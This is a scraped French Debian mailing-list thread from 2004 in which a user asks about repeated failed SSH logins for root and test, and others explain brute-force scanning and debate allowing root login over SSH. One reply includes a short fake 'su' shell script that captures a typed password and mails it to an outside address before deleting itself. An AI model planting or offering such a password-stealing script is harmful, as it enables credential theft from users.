Voilà, j'ai un petit soucis que je n'avais pas avant (ou alors, je l'avais
mais je ne l'avais pas remarqué)
Dans mes log, je trouve fréquement ( 5 à 10 fois par jour) ce genre de
choses :
Aug 8 11:34:04 passerelle sshd[22508]: PAM-listfile: Refused user test for
service ssh
Aug 8 11:34:06 passerelle sshd[22508]: Failed password for test from
68.73.134.109 port 34454 ssh2
Aug 8 11:34:24 passerelle sshd[22518]: PAM-listfile: Refused user root for
service ssh
Aug 8 11:34:24 passerelle PAM_unix[22518]: authentication failure;
(uid=0) -> root for ssh service
Aug 8 11:34:26 passerelle sshd[22518]: Failed password for root from
68.73.134.109 port 34991 ssh2
Aug 8 11:34:30 passerelle sshd[22520]: PAM-listfile: Refused user root for
service ssh
Aug 8 11:34:30 passerelle PAM_unix[22520]: authentication failure;
(uid=0) -> root for ssh service
Aug 8 11:34:32 passerelle sshd[22520]: Failed password for root from
68.73.134.109 port 35119 ssh2
Aug 8 11:34:35 passerelle sshd[22522]: PAM-listfile: Refused user root for
service ssh
Aug 8 11:34:35 passerelle PAM_unix[22522]: authentication failure;
(uid=0) -> root for ssh service
Aug 8 11:34:37 passerelle sshd[22522]: Failed password for root from
68.73.134.109 port 35257 ssh2
Aug 8 11:34:39 passerelle sshd[22524]: PAM-listfile: Refused user test for
service ssh
Aug 8 11:34:39 passerelle PAM_unix[22524]: authentication failure;
(uid=0) -> test for ssh service
Aug 8 11:34:41 passerelle sshd[22524]: Failed password for test from
68.73.134.109 port 35354 ssh2
Ma question est la suivante, que cherchent-ils à faire exactement ??????
Ils pensent pouvoir se connecter sans mot de passe avec l'utilisateur test
ou encore en root (déjà autoriser root en ssh, faut être polio !!)
Ou bien, c'est juste pour voir quelle version de ssh j'utilise pour
exploiter telle ou telle faille ???
J'avoue que je ne comprends pas bien la démarche. Si quelqu'un peut
m'eclairer ..
Merci
Thomas
--
Pensez à lire la FAQ de la liste avant de poser une question :
http://wiki.debian.net/?DebianFrench
Pensez à rajouter le mot ``spam'' dans vos champs "From" et "Reply-To:"
To UNSUBSCRIBE, email to debian-user-french-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire
Veuillez sélectionner un problème
Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
Alain
Il y a une vague de tentatives d'accès telnet et ssh actuellement (j'ai un site chez un hébergeur qui a reporté ce genre de tentative sur tout leur réseau).
Il s'emblerait que des pirates cherchent des machines pour des attaques DDOS etc.
Alain
-----Message d'origine----- De : Corwin [mailto:] Envoyé : mardi 10 août 2004 20:40 À : Objet : Tentative d'intrusion ssh
Bonjour à tous,
Voilà, j'ai un petit soucis que je n'avais pas avant (ou alors, je l'avais mais je ne l'avais pas remarqué) Dans mes log, je trouve fréquement ( 5 à 10 fois par jour) ce genre de choses :
Aug 8 11:34:04 passerelle sshd[22508]: PAM-listfile: Refused user test for service ssh Aug 8 11:34:06 passerelle sshd[22508]: Failed password for test from 68.73.134.109 port 34454 ssh2 Aug 8 11:34:24 passerelle sshd[22518]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:24 passerelle PAM_unix[22518]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:26 passerelle sshd[22518]: Failed password for root from 68.73.134.109 port 34991 ssh2 Aug 8 11:34:30 passerelle sshd[22520]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:30 passerelle PAM_unix[22520]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:32 passerelle sshd[22520]: Failed password for root from 68.73.134.109 port 35119 ssh2 Aug 8 11:34:35 passerelle sshd[22522]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:35 passerelle PAM_unix[22522]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:37 passerelle sshd[22522]: Failed password for root from 68.73.134.109 port 35257 ssh2 Aug 8 11:34:39 passerelle sshd[22524]: PAM-listfile: Refused user test for service ssh Aug 8 11:34:39 passerelle PAM_unix[22524]: authentication failure; (uid=0) -> test for ssh service Aug 8 11:34:41 passerelle sshd[22524]: Failed password for test from 68.73.134.109 port 35354 ssh2
Ma question est la suivante, que cherchent-ils à faire exactement ?????? Ils pensent pouvoir se connecter sans mot de passe avec l'utilisateur test ou encore en root (déjà autoriser root en ssh, faut être polio !!) Ou bien, c'est juste pour voir quelle version de ssh j'utilise pour exploiter telle ou telle faille ???
J'avoue que je ne comprends pas bien la démarche. Si quelqu'un peut m'eclairer ..
Merci
Thomas
-- Pensez à lire la FAQ de la liste avant de poser une question : http://wiki.debian.net/?DebianFrench
Pensez à rajouter le mot ``spam'' dans vos champs "From" et "Reply-To:"
To UNSUBSCRIBE, email to with a subject of "unsubscribe". Trouble? Contact
Il y a une vague de tentatives d'accès telnet et ssh actuellement (j'ai un
site chez un hébergeur qui a reporté ce genre de tentative sur tout leur
réseau).
Il s'emblerait que des pirates cherchent des machines pour des attaques DDOS
etc.
Alain
-----Message d'origine-----
De : Corwin [mailto:debian@lefeuvre.org]
Envoyé : mardi 10 août 2004 20:40
À : debian-user-french@lists.debian.org
Objet : Tentative d'intrusion ssh
Bonjour à tous,
Voilà, j'ai un petit soucis que je n'avais pas avant (ou alors, je l'avais
mais je ne l'avais pas remarqué)
Dans mes log, je trouve fréquement ( 5 à 10 fois par jour) ce genre de
choses :
Aug 8 11:34:04 passerelle sshd[22508]: PAM-listfile: Refused user test
for
service ssh
Aug 8 11:34:06 passerelle sshd[22508]: Failed password for test from
68.73.134.109 port 34454 ssh2
Aug 8 11:34:24 passerelle sshd[22518]: PAM-listfile: Refused user root
for
service ssh
Aug 8 11:34:24 passerelle PAM_unix[22518]: authentication failure;
(uid=0) -> root for ssh service
Aug 8 11:34:26 passerelle sshd[22518]: Failed password for root from
68.73.134.109 port 34991 ssh2
Aug 8 11:34:30 passerelle sshd[22520]: PAM-listfile: Refused user root
for
service ssh
Aug 8 11:34:30 passerelle PAM_unix[22520]: authentication failure;
(uid=0) -> root for ssh service
Aug 8 11:34:32 passerelle sshd[22520]: Failed password for root from
68.73.134.109 port 35119 ssh2
Aug 8 11:34:35 passerelle sshd[22522]: PAM-listfile: Refused user root
for
service ssh
Aug 8 11:34:35 passerelle PAM_unix[22522]: authentication failure;
(uid=0) -> root for ssh service
Aug 8 11:34:37 passerelle sshd[22522]: Failed password for root from
68.73.134.109 port 35257 ssh2
Aug 8 11:34:39 passerelle sshd[22524]: PAM-listfile: Refused user test
for
service ssh
Aug 8 11:34:39 passerelle PAM_unix[22524]: authentication failure;
(uid=0) -> test for ssh service
Aug 8 11:34:41 passerelle sshd[22524]: Failed password for test from
68.73.134.109 port 35354 ssh2
Ma question est la suivante, que cherchent-ils à faire exactement ??????
Ils pensent pouvoir se connecter sans mot de passe avec l'utilisateur test
ou encore en root (déjà autoriser root en ssh, faut être polio !!)
Ou bien, c'est juste pour voir quelle version de ssh j'utilise pour
exploiter telle ou telle faille ???
J'avoue que je ne comprends pas bien la démarche. Si quelqu'un peut
m'eclairer ..
Merci
Thomas
--
Pensez à lire la FAQ de la liste avant de poser une question :
http://wiki.debian.net/?DebianFrench
Pensez à rajouter le mot ``spam'' dans vos champs "From" et "Reply-To:"
To UNSUBSCRIBE, email to debian-user-french-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org
Il y a une vague de tentatives d'accès telnet et ssh actuellement (j'ai un site chez un hébergeur qui a reporté ce genre de tentative sur tout leur réseau).
Il s'emblerait que des pirates cherchent des machines pour des attaques DDOS etc.
Alain
-----Message d'origine----- De : Corwin [mailto:] Envoyé : mardi 10 août 2004 20:40 À : Objet : Tentative d'intrusion ssh
Bonjour à tous,
Voilà, j'ai un petit soucis que je n'avais pas avant (ou alors, je l'avais mais je ne l'avais pas remarqué) Dans mes log, je trouve fréquement ( 5 à 10 fois par jour) ce genre de choses :
Aug 8 11:34:04 passerelle sshd[22508]: PAM-listfile: Refused user test for service ssh Aug 8 11:34:06 passerelle sshd[22508]: Failed password for test from 68.73.134.109 port 34454 ssh2 Aug 8 11:34:24 passerelle sshd[22518]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:24 passerelle PAM_unix[22518]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:26 passerelle sshd[22518]: Failed password for root from 68.73.134.109 port 34991 ssh2 Aug 8 11:34:30 passerelle sshd[22520]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:30 passerelle PAM_unix[22520]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:32 passerelle sshd[22520]: Failed password for root from 68.73.134.109 port 35119 ssh2 Aug 8 11:34:35 passerelle sshd[22522]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:35 passerelle PAM_unix[22522]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:37 passerelle sshd[22522]: Failed password for root from 68.73.134.109 port 35257 ssh2 Aug 8 11:34:39 passerelle sshd[22524]: PAM-listfile: Refused user test for service ssh Aug 8 11:34:39 passerelle PAM_unix[22524]: authentication failure; (uid=0) -> test for ssh service Aug 8 11:34:41 passerelle sshd[22524]: Failed password for test from 68.73.134.109 port 35354 ssh2
Ma question est la suivante, que cherchent-ils à faire exactement ?????? Ils pensent pouvoir se connecter sans mot de passe avec l'utilisateur test ou encore en root (déjà autoriser root en ssh, faut être polio !!) Ou bien, c'est juste pour voir quelle version de ssh j'utilise pour exploiter telle ou telle faille ???
J'avoue que je ne comprends pas bien la démarche. Si quelqu'un peut m'eclairer ..
Merci
Thomas
-- Pensez à lire la FAQ de la liste avant de poser une question : http://wiki.debian.net/?DebianFrench
Pensez à rajouter le mot ``spam'' dans vos champs "From" et "Reply-To:"
To UNSUBSCRIBE, email to with a subject of "unsubscribe". Trouble? Contact
Philippe Marzouk
On Tue, Aug 10, 2004 at 08:39:54PM +0200, Corwin wrote:
Bonjour à tous,
Voilà, j'ai un petit soucis que je n'avais pas avant (ou alors, je l'avais mais je ne l'avais pas remarqué) Dans mes log, je trouve fréquement ( 5 à 10 fois par jour) ce genre de choses :
Aug 8 11:34:04 passerelle sshd[22508]: PAM-listfile: Refused user test for service ssh Aug 8 11:34:06 passerelle sshd[22508]: Failed password for test from 68.73.134.109 port 34454 ssh2 Aug 8 11:34:24 passerelle sshd[22518]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:24 passerelle PAM_unix[22518]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:26 passerelle sshd[22518]: Failed password for root from 68.73.134.109 port 34991 ssh2 Aug 8 11:34:30 passerelle sshd[22520]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:30 passerelle PAM_unix[22520]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:32 passerelle sshd[22520]: Failed password for root from 68.73.134.109 port 35119 ssh2 Aug 8 11:34:35 passerelle sshd[22522]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:35 passerelle PAM_unix[22522]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:37 passerelle sshd[22522]: Failed password for root from 68.73.134.109 port 35257 ssh2 Aug 8 11:34:39 passerelle sshd[22524]: PAM-listfile: Refused user test for service ssh Aug 8 11:34:39 passerelle PAM_unix[22524]: authentication failure; (uid=0) -> test for ssh service Aug 8 11:34:41 passerelle sshd[22524]: Failed password for test from 68.73.134.109 port 35354 ssh2
Ma question est la suivante, que cherchent-ils à faire exactement ?????? Ils pensent pouvoir se connecter sans mot de passe avec l'utilisateur test ou encore en root (déjà autoriser root en ssh, faut être polio !!) Ou bien, c'est juste pour voir quelle version de ssh j'utilise pour exploiter telle ou telle faille ???
J'avoue que je ne comprends pas bien la démarche. Si quelqu'un peut m'eclairer ..
Voici un lien qui a été donné sur debian-user qui explique un peu la chose:
-- Pensez à lire la FAQ de la liste avant de poser une question : http://wiki.debian.net/?DebianFrench
Pensez à rajouter le mot ``spam'' dans vos champs "From" et "Reply-To:"
To UNSUBSCRIBE, email to with a subject of "unsubscribe". Trouble? Contact
On Tue, Aug 10, 2004 at 08:39:54PM +0200, Corwin wrote:
Bonjour à tous,
Voilà, j'ai un petit soucis que je n'avais pas avant (ou alors, je l'avais
mais je ne l'avais pas remarqué)
Dans mes log, je trouve fréquement ( 5 à 10 fois par jour) ce genre de
choses :
Aug 8 11:34:04 passerelle sshd[22508]: PAM-listfile: Refused user test for
service ssh
Aug 8 11:34:06 passerelle sshd[22508]: Failed password for test from
68.73.134.109 port 34454 ssh2
Aug 8 11:34:24 passerelle sshd[22518]: PAM-listfile: Refused user root for
service ssh
Aug 8 11:34:24 passerelle PAM_unix[22518]: authentication failure;
(uid=0) -> root for ssh service
Aug 8 11:34:26 passerelle sshd[22518]: Failed password for root from
68.73.134.109 port 34991 ssh2
Aug 8 11:34:30 passerelle sshd[22520]: PAM-listfile: Refused user root for
service ssh
Aug 8 11:34:30 passerelle PAM_unix[22520]: authentication failure;
(uid=0) -> root for ssh service
Aug 8 11:34:32 passerelle sshd[22520]: Failed password for root from
68.73.134.109 port 35119 ssh2
Aug 8 11:34:35 passerelle sshd[22522]: PAM-listfile: Refused user root for
service ssh
Aug 8 11:34:35 passerelle PAM_unix[22522]: authentication failure;
(uid=0) -> root for ssh service
Aug 8 11:34:37 passerelle sshd[22522]: Failed password for root from
68.73.134.109 port 35257 ssh2
Aug 8 11:34:39 passerelle sshd[22524]: PAM-listfile: Refused user test for
service ssh
Aug 8 11:34:39 passerelle PAM_unix[22524]: authentication failure;
(uid=0) -> test for ssh service
Aug 8 11:34:41 passerelle sshd[22524]: Failed password for test from
68.73.134.109 port 35354 ssh2
Ma question est la suivante, que cherchent-ils à faire exactement ??????
Ils pensent pouvoir se connecter sans mot de passe avec l'utilisateur test
ou encore en root (déjà autoriser root en ssh, faut être polio !!)
Ou bien, c'est juste pour voir quelle version de ssh j'utilise pour
exploiter telle ou telle faille ???
J'avoue que je ne comprends pas bien la démarche. Si quelqu'un peut
m'eclairer ..
Voici un lien qui a été donné sur debian-user qui explique un peu la
chose:
On Tue, Aug 10, 2004 at 08:39:54PM +0200, Corwin wrote:
Bonjour à tous,
Voilà, j'ai un petit soucis que je n'avais pas avant (ou alors, je l'avais mais je ne l'avais pas remarqué) Dans mes log, je trouve fréquement ( 5 à 10 fois par jour) ce genre de choses :
Aug 8 11:34:04 passerelle sshd[22508]: PAM-listfile: Refused user test for service ssh Aug 8 11:34:06 passerelle sshd[22508]: Failed password for test from 68.73.134.109 port 34454 ssh2 Aug 8 11:34:24 passerelle sshd[22518]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:24 passerelle PAM_unix[22518]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:26 passerelle sshd[22518]: Failed password for root from 68.73.134.109 port 34991 ssh2 Aug 8 11:34:30 passerelle sshd[22520]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:30 passerelle PAM_unix[22520]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:32 passerelle sshd[22520]: Failed password for root from 68.73.134.109 port 35119 ssh2 Aug 8 11:34:35 passerelle sshd[22522]: PAM-listfile: Refused user root for service ssh Aug 8 11:34:35 passerelle PAM_unix[22522]: authentication failure; (uid=0) -> root for ssh service Aug 8 11:34:37 passerelle sshd[22522]: Failed password for root from 68.73.134.109 port 35257 ssh2 Aug 8 11:34:39 passerelle sshd[22524]: PAM-listfile: Refused user test for service ssh Aug 8 11:34:39 passerelle PAM_unix[22524]: authentication failure; (uid=0) -> test for ssh service Aug 8 11:34:41 passerelle sshd[22524]: Failed password for test from 68.73.134.109 port 35354 ssh2
Ma question est la suivante, que cherchent-ils à faire exactement ?????? Ils pensent pouvoir se connecter sans mot de passe avec l'utilisateur test ou encore en root (déjà autoriser root en ssh, faut être polio !!) Ou bien, c'est juste pour voir quelle version de ssh j'utilise pour exploiter telle ou telle faille ???
J'avoue que je ne comprends pas bien la démarche. Si quelqu'un peut m'eclairer ..
Voici un lien qui a été donné sur debian-user qui explique un peu la chose:
-- Pensez à lire la FAQ de la liste avant de poser une question : http://wiki.debian.net/?DebianFrench
Pensez à rajouter le mot ``spam'' dans vos champs "From" et "Reply-To:"
To UNSUBSCRIBE, email to with a subject of "unsubscribe". Trouble? Contact
Alain Tesio
On Tue, 10 Aug 2004 20:39:54 +0200 "Corwin" wrote:
Voilà, j'ai un petit soucis que je n'avais pas avant (ou alors, je l'av ais mais je ne l'avais pas remarqué)
C'est essentiel d'avoir logcheck ou analogue pour que les fichiers de log servent à quelque chose.
Dans mes log, je trouve fréquement ( 5 à 10 fois par jour) ce genre de choses :
Moi aussi, pas de quoi s'inquiéter si tu ne t'inquétais pas avant.
Ma question est la suivante, que cherchent-ils à faire exactement ??????
A trouver un login, pour envoyer des spams, lancer des attaques sans être tracés, avoir plein de sources pour des DDOS, ...
Ils pensent pouvoir se connecter sans mot de passe avec l'utilisateur test ou encore en root (déjà autoriser root en ssh, faut être polio !!)
Je suis polio alors, je ne comprends pas en quoi je devrais me sentir plus tranquille avec un user qui a le droit de passer root. Il faut bien que j'arrive à root d'une manière ou d'une autre, je n'ai pas d'accès physique à la machine.
Je suis le seul administrateur de la machine, j'utilise des clés et pas d e password. Il me faudrait faire un truc plus compliqué pour faire des backup par rsy nc.
Ca peut éventuellement servir à voir qui passe en root s'il y a plusieu rs admins, mais pour ça je préférerais encore plusieurs logins avec uid =0
C'est par défaut à yes dans Debian. Comme ça t'as l'air évident que c'est polio, ça m'intéresse de savo ir pourquoi.
Les arguments que j'ai trouvés c'est du genre de ça:
http://geodsoft.com/howto/ssh/servers.htm
"This forces a remote user to know two user passwords to login as root. Fir st they must know a normal user's password, then they must know root's password as well"
Et alors ?? Autant faire un password deux fois plus long si c'est le probl ème.
Quelqu'un qui trouve le password avec un keylogger ou autre peut aussi bien trouver le deuxième. S'il n'a que le premier, il peut installer dans le path de ce user un script "su" de ce genre:
echo -n "Password: " read pass echo $pass | mail sleep 2 echo "su: Authentification failure" # là tu crois que tu t'es planté de password echo "Sorry" # Le prochain su marche rm $0
Si tu considère que le premier password n'est pas aussi essentiel que si n'avais qu'un vrai password root, ou si tu utilises ce compte régulièrement pour autr e chose, c'est pire.
On Tue, 10 Aug 2004 20:39:54 +0200
"Corwin" <debian@lefeuvre.org> wrote:
Voilà, j'ai un petit soucis que je n'avais pas avant (ou alors, je l'av ais
mais je ne l'avais pas remarqué)
C'est essentiel d'avoir logcheck ou analogue pour que les fichiers de
log servent à quelque chose.
Dans mes log, je trouve fréquement ( 5 à 10 fois par jour) ce genre de
choses :
Moi aussi, pas de quoi s'inquiéter si tu ne t'inquétais pas avant.
Ma question est la suivante, que cherchent-ils à faire exactement ??????
A trouver un login, pour envoyer des spams, lancer des attaques sans
être tracés, avoir plein de sources pour des DDOS, ...
Ils pensent pouvoir se connecter sans mot de passe avec l'utilisateur test
ou encore en root (déjà autoriser root en ssh, faut être polio !!)
Je suis polio alors, je ne comprends pas en quoi je devrais me sentir
plus tranquille avec un user qui a le droit de passer root. Il faut bien
que j'arrive à root d'une manière ou d'une autre, je n'ai pas d'accès
physique à la machine.
Je suis le seul administrateur de la machine, j'utilise des clés et pas d e password.
Il me faudrait faire un truc plus compliqué pour faire des backup par rsy nc.
Ca peut éventuellement servir à voir qui passe en root s'il y a plusieu rs
admins, mais pour ça je préférerais encore plusieurs logins avec uid =0
C'est par défaut à yes dans Debian.
Comme ça t'as l'air évident que c'est polio, ça m'intéresse de savo ir pourquoi.
Les arguments que j'ai trouvés c'est du genre de ça:
http://geodsoft.com/howto/ssh/servers.htm
"This forces a remote user to know two user passwords to login as root. Fir st they
must know a normal user's password, then they must know root's password as well"
Et alors ?? Autant faire un password deux fois plus long si c'est le probl ème.
Quelqu'un qui trouve le password avec un keylogger ou autre peut aussi
bien trouver le deuxième. S'il n'a que le premier, il peut installer dans le path de
ce user un script "su" de ce genre:
echo -n "Password: "
read pass
echo $pass | mail joe9249@hotmail.com
sleep 2
echo "su: Authentification failure"
# là tu crois que tu t'es planté de password
echo "Sorry"
# Le prochain su marche
rm $0
Si tu considère que le premier password n'est pas aussi essentiel que si n'avais qu'un
vrai password root, ou si tu utilises ce compte régulièrement pour autr e chose, c'est
pire.
On Tue, 10 Aug 2004 20:39:54 +0200 "Corwin" wrote:
Voilà, j'ai un petit soucis que je n'avais pas avant (ou alors, je l'av ais mais je ne l'avais pas remarqué)
C'est essentiel d'avoir logcheck ou analogue pour que les fichiers de log servent à quelque chose.
Dans mes log, je trouve fréquement ( 5 à 10 fois par jour) ce genre de choses :
Moi aussi, pas de quoi s'inquiéter si tu ne t'inquétais pas avant.
Ma question est la suivante, que cherchent-ils à faire exactement ??????
A trouver un login, pour envoyer des spams, lancer des attaques sans être tracés, avoir plein de sources pour des DDOS, ...
Ils pensent pouvoir se connecter sans mot de passe avec l'utilisateur test ou encore en root (déjà autoriser root en ssh, faut être polio !!)
Je suis polio alors, je ne comprends pas en quoi je devrais me sentir plus tranquille avec un user qui a le droit de passer root. Il faut bien que j'arrive à root d'une manière ou d'une autre, je n'ai pas d'accès physique à la machine.
Je suis le seul administrateur de la machine, j'utilise des clés et pas d e password. Il me faudrait faire un truc plus compliqué pour faire des backup par rsy nc.
Ca peut éventuellement servir à voir qui passe en root s'il y a plusieu rs admins, mais pour ça je préférerais encore plusieurs logins avec uid =0
C'est par défaut à yes dans Debian. Comme ça t'as l'air évident que c'est polio, ça m'intéresse de savo ir pourquoi.
Les arguments que j'ai trouvés c'est du genre de ça:
http://geodsoft.com/howto/ssh/servers.htm
"This forces a remote user to know two user passwords to login as root. Fir st they must know a normal user's password, then they must know root's password as well"
Et alors ?? Autant faire un password deux fois plus long si c'est le probl ème.
Quelqu'un qui trouve le password avec un keylogger ou autre peut aussi bien trouver le deuxième. S'il n'a que le premier, il peut installer dans le path de ce user un script "su" de ce genre:
echo -n "Password: " read pass echo $pass | mail sleep 2 echo "su: Authentification failure" # là tu crois que tu t'es planté de password echo "Sorry" # Le prochain su marche rm $0
Si tu considère que le premier password n'est pas aussi essentiel que si n'avais qu'un vrai password root, ou si tu utilises ce compte régulièrement pour autr e chose, c'est pire.